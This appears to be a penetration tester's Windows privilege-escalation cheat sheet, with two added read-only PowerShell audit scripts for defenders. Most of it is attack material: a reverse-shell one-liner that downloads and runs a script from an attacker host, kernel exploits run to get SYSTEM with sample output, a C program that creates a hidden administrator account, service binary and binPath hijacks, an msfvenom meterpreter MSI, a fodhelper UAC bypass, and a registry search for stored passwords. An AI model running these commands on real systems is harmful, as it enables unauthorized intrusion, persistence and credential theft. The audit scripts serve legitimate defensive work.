
Windows Privilege Escalation

Upgrade Shell

Fully interactive reverse shell on Windows

Server Side

stty raw -echo; (stty size; cat) | sudo nc -lvnp myport

Client Side

powershell IEX(IWR http://myip/Invoke-ConPtyShell.ps1 -UseBasicParsing); Invoke-ConPtyShell myip myport

File Invoke-ConPtyShell.ps1

User Enumeration

Current User

whoami
net user <username>
whoami /groups

Other Users

net user
net localgroup administrators

Hostname

hostname

Installed Software and Patch Levels

wmic product get name, version, vendor
dir "C:\Program Files"
dir "C:\Program Files (x86)"

Patch Levels

wmic qfe get Caption, Description, HotFixID, InstalledOn

Device Drivers & Kernel Modules

Using powershell

driverquery.exe /v /fo csv | ConvertFrom-CSV | Select-Object 'Display Name', 'Start Mode', Path
Get-WmiObject Win32_PnPSignedDriver | Select-Object DeviceName, DriverVersion, Manufacturer | Where-Object {$_.DeviceName -like "*VMware*"}

OS & Architecture & Driver

OS & Architecture

systeminfo | findstr /B /C:"OS Name" /C:"OS Version" /C:"System Type"

Driver Enumeration

driverquery /v

6.3.9600 Kernel-Mode Drivers

C:\Users\kostas\Desktop>systeminfo | findstr /B /C:"OS Name" /C:"OS Version" /C:"System Type"
OS Name:                   Microsoft Windows Server 2012 R2 Standard
OS Version:                6.3.9600 N/A Build 9600
System Type:               x64-based

https://github.com/leecybersec/windows-kernel-exploits/blob/master/MS15-051/MS15-051-KB3045171.zip

C:\inetpub\drupal-7.54>ms15-051x64.exe "powershell.exe IEX (New-Object System.Net.WebClient).DownloadString('http://10.10.14.5/shell.ps1')"
ms15-051x64.exe "powershell.exe IEX (New-Object System.Net.WebClient).DownloadString('http://10.10.14.5/shell.ps1')"
[#] ms15-051 fixed by zcgonvh
[!] process with pid: 1076 created.
==============================
$ sudo nc -nvlp 443
listening on [any] 443 ...
connect to [10.10.14.5] from (UNKNOWN) [10.10.10.9] 53968
Microsoft Windows [Version 6.1.7600]
Copyright (c) 2009 Microsoft Corporation.  All rights reserved.

C:\inetpub\drupal-7.54>whoami
whoami
nt authority\system

CVE-2015-1701

6.3.9600 rgnobj Integer Overflow

C:\Users\kostas\Desktop>systeminfo | findstr /B /C:"OS Name" /C:"OS Version" /C:"System Type"
OS Name:                   Microsoft Windows Server 2012 R2 Standard
OS Version:                6.3.9600 N/A Build 9600
System Type:               x64-based
wget https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/41020.exe
C:\Users\kostas\Desktop>41020.exe
41020.exe
Microsoft Windows [Version 6.3.9600]
(c) 2013 Microsoft Corporation. All rights reserved.

C:\Users\kostas\Desktop>whoami
whoami
nt authority\system

https://github.com/leecybersec/walkthrough/tree/master/hackthebox/006-optimum_httpfileserver-2.3_ms16-098-6.3.9600#rgnobj-integer-overflow

6.1.7600 Ancillary Function Driver

https://www.exploit-db.com/exploits/40564

c:\windows\system32\inetsrv>systeminfo | findstr /B /C:"OS Name" /C:"OS Version" /C:"System Type"
systeminfo | findstr /B /C:"OS Name" /C:"OS Version" /C:"System Type"
OS Name:                   Microsoft Windows 7 Enterprise
OS Version:                6.1.7600 N/A Build 7600
System Type:               X86-based PC
i686-w64-mingw32-gcc 40564.c -o 40564.exe -lws2_32
c:\Users\Public>40564.exe
40564.exe

c:\Windows\System32>whoami
whoami
nt authority\system

Vulnerability in Ancillary Function Driver

Windows MS11-046 kernel

c:\Windows\System32>systeminfo | findstr /B /C:"OS Name" /C:"OS Version"
OS Name:                   Microsoftr Windows Serverr 2008 Standard 
OS Version:                6.0.6001 Service Pack 1 Build 6001

https://github.com/abatchy17/WindowsExploits/tree/master/MS11-046

C:\wamp\www>MS11-046.exe
MS11-046.exe

c:\Windows\System32>whoami
whoami
nt authority\system

Scheduled Tasks

schtasks /query /fo LIST /v
schtasks /query /fo LIST /v | findstr /B /C:"Task To Run" /C:"Next Run Time" /C:"Last Run Time" /C:"Schedule Type" /C:"Start Time" /C:"Start Date"

Readable/Writable

Using accesschk

accesschk.exe -accepteula
accesschk.exe -uws <user> "C:\Program Files"

Using powershell

Get-ChildItem "C:\Program Files" -Recurse | Get-ACL | ?{$_.AccessToString -match "Everyone\sAllow\s\sModify"}
Get-ChildItem "C:\Users\windows_10_1903_x64\Desktop" -Recurse | Get-ACL | findstr /C:"<user-name>"

Processes and Services

tasklist /SVC

Active network connections

netstat -ano

Insecure File Permissions

Get the name and binary path of running services

Powershell

Get-WmiObject win32_service | Select-Object Name, State, PathName | Where-Object {$_.State -like 'Running'}
icacls "C:\Windows\system32\wbem\WmiApSrv.exe"

icacls

Mask Permissions
F Full access
M Modify access
RX Read and execute access
R Read-only access
W Write-only access

The binary can be overwritten if the current user has F or W permission on it.

i686-w64-mingw32-gcc adduser.c -o adduser.exe

#include <stdlib.h>

/* adduser.c: creates a local user and adds it to the Administrators group.
   When dropped in as the service binary it runs under the service account. */
int main(void)
{
    system("net user backup Adm1nP@ssWD /add");
    system("net localgroup administrators backup /add");
    return 0;
}

Replace the service binary with adduser.exe

move adduser.exe "C:\Program Files\Serviio\bin\ServiioService.exe"

Check StartMode for service

wmic service where caption="Serviio" get name, caption, state, startmode

==> StartMode: Auto

Check whether the user can restart the system (SeShutdownPrivilege)

whoami /priv

Restart system

shutdown /r /t 0

Check Administrators group

net localgroup Administrators

Insecure Service Permissions

sc qc "service"
accesschk64.exe -uwcqv <user> *

==> Look for SERVICE_ALL_ACCESS or SERVICE_CHANGE_CONFIG

sc config "service" binPath= "net localgroup administrators user /add"
sc config "service" binPath= "c:\users\public\shell.exe"
sc stop "service"
sc start "service"

https://asfiyashaikh.medium.com/windows-privesc-weak-service-permission-b90f3bf4d44f

https://medium.com/@orhan_yildirim/windows-privilege-escalation-insecure-service-permissions-e4f33dbff219

Leveraging Unquoted Paths

wmic service get displayname,pathname

If a service path contains spaces and is not quoted, Windows tries each of the following executables in turn before reaching the intended one:

C:\Program.exe
C:\Program Files\My.exe
C:\Program Files\My Program\My.exe
C:\Program Files\My Program\My service\service.exe
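An added audit script, not from the original page, that covers the checks from the Insecure File Permissions and Unquoted Paths sections in one pass: it flags services whose path is unquoted and contains spaces, and services whose binary file is writable by low-privilege principals, printing the fix command rather than changing anything. It assumes Windows PowerShell 5.1 or later and English principal names; the principal list and function names are this example's own.

```powershell
# Added audit (not from the original page). Read-only: prints findings and the fix.
# Assumes Windows PowerShell 5.1+ and English (non-localized) principal names.

$WeakPrincipals = @('Everyone', 'BUILTIN\Users',
                    'NT AUTHORITY\Authenticated Users', 'NT AUTHORITY\INTERACTIVE')
$WriteRights = [System.Security.AccessControl.FileSystemRights]'Write, Modify, FullControl, TakeOwnership, ChangePermissions'

function Get-ServiceBinaryPath {
    param([string]$PathName)
    # Quoted path: the executable is the text between the quotes
    if ($PathName -match '^"([^"]+)"') { return $Matches[1] }
    # Unquoted path: the executable ends at the first ".exe" (arguments may follow)
    if ($PathName -match '^(.+?\.exe)') { return $Matches[1] }
    return ($PathName -split ' ')[0]
}

function Test-UnquotedServicePath {
    param([string]$PathName)
    # Finding only when the path is unquoted AND a space precedes the executable name
    $exe = Get-ServiceBinaryPath $PathName
    return (-not $PathName.StartsWith('"')) -and ($exe -match '\s')
}

function Get-WeakBinaryAce {
    param([string]$Path)
    if (-not $Path -or -not (Test-Path -LiteralPath $Path)) { return @() }
    (Get-Acl -LiteralPath $Path).Access | Where-Object {
        $_.AccessControlType -eq 'Allow' -and
        $WeakPrincipals -contains $_.IdentityReference.Value -and
        ([int]($_.FileSystemRights -band $WriteRights)) -ne 0
    }
}

function Invoke-ServiceAudit {
    foreach ($svc in Get-CimInstance Win32_Service) {
        $bin = Get-ServiceBinaryPath $svc.PathName
        if (Test-UnquotedServicePath $svc.PathName) {
            '[UNQUOTED] {0} ({1}): {2}' -f $svc.Name, $svc.StartMode, $svc.PathName
            '           fix: sc config {0} binPath= "\"{1}\""' -f $svc.Name, $bin
        }
        foreach ($ace in Get-WeakBinaryAce $bin) {
            '[WRITABLE] {0}: {1} writable by {2} ({3})' -f $svc.Name, $bin, $ace.IdentityReference, $ace.FileSystemRights
        }
    }
}

Invoke-ServiceAudit
```

A [WRITABLE] line on an Auto-start service is the condition the Serviio walkthrough above abuses; tightening the file ACL or reinstalling the service under C:\Program Files with inherited permissions removes it.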

Binaries That AutoElevate

AlwaysInstallElevated

https://www.hackingarticles.in/windows-privilege-escalation-alwaysinstallelevated

Enumeration commands

reg query HKCU\SOFTWARE\Policies\Microsoft\Windows\Installer
reg query HKLM\SOFTWARE\Policies\Microsoft\Windows\Installer

Exploit

msfvenom -p windows/meterpreter/reverse_tcp lhost=192.168.1.120 lport=4567 -f msi > /root/Desktop/1.msi
msiexec /quiet /qn /i 1.msi

Bypass UAC via registry hijacking (fodhelper)

Check mandatory integrity level

whoami /groups

Run cmd.exe as Administrator to get High Mandatory Level

powershell.exe Start-Process cmd.exe -Verb runAs

C:\Windows\System32\fodhelper.exe

REG ADD HKCU\Software\Classes\ms-settings\Shell\Open\command
REG ADD HKCU\Software\Classes\ms-settings\Shell\Open\command /v DelegateExecute /t REG_SZ
REG ADD HKCU\Software\Classes\ms-settings\Shell\Open\command /d "C:\Users\windows_10_1903_x64\Desktop\shell.exe" /f
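Added defender-side checks, not from the original page, for the two registry conditions covered in the AlwaysInstallElevated and fodhelper sections above: whether the installer policy is set to 1 in both hives (it only takes effect when both are set), and whether the HKCU ms-settings handler key that the REG ADD lines create is present. Both functions are read-only and print the fix command; function names are this example's own and it assumes Windows PowerShell 5.1 or later.

```powershell
# Added checks (not from the original page). Read-only: findings are reported and
# the fix command is printed, not run. Assumes Windows PowerShell 5.1 or later.

function Test-AlwaysInstallElevated {
    # The policy takes effect only when AlwaysInstallElevated is 1 in BOTH hives.
    $keys = @('HKLM:\SOFTWARE\Policies\Microsoft\Windows\Installer',
              'HKCU:\SOFTWARE\Policies\Microsoft\Windows\Installer')
    $set = foreach ($k in $keys) {
        $v = (Get-ItemProperty -Path $k -Name AlwaysInstallElevated -ErrorAction SilentlyContinue).AlwaysInstallElevated
        [bool]($v -eq 1)
    }
    $result = [pscustomobject]@{ Machine = $set[0]; User = $set[1]; Exploitable = ($set[0] -and $set[1]) }
    if ($result.Exploitable) {
        Write-Warning 'AlwaysInstallElevated is on in both hives: any user can install an MSI as SYSTEM.'
        'fix: reg add HKLM\SOFTWARE\Policies\Microsoft\Windows\Installer /v AlwaysInstallElevated /t REG_DWORD /d 0 /f'
        '     (repeat for HKCU)'
    }
    $result
}

function Test-MsSettingsHijack {
    # fodhelper.exe auto-elevates and resolves the ms-settings handler through HKCU,
    # where this command key is not present by default. Finding it, with an empty
    # DelegateExecute value, is the artifact the REG ADD lines above leave behind.
    $key = 'HKCU:\Software\Classes\ms-settings\Shell\Open\command'
    if (-not (Test-Path $key)) { return $null }
    $props = Get-ItemProperty -Path $key
    [pscustomobject]@{
        Key             = $key
        Command         = $props.'(default)'
        DelegateExecute = [bool]$props.PSObject.Properties['DelegateExecute']
        Fix             = 'reg delete HKCU\Software\Classes\ms-settings /f'
    }
}

Test-AlwaysInstallElevated
Test-MsSettingsHijack
```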

Unmounted Disks

mountvol

Networking Enumeration

ipconfig /all
route print

Firewall Status and Rules

netsh advfirewall show currentprofile
netsh advfirewall firewall show rule name=all

Enumeration Tools

windows-privesc-check

windows-privesc-check2.exe --help

winPEAS

winPEASx86.exe

More commands

Add Local Admin User

net user /add <user> <pass>
net localgroup administrators <user> /add

Run CMD as Admin

powershell.exe Start-Process cmd.exe -Verb runAs

Clear-text passwords stored in the registry

reg query HKLM /f pass /t REG_SZ /s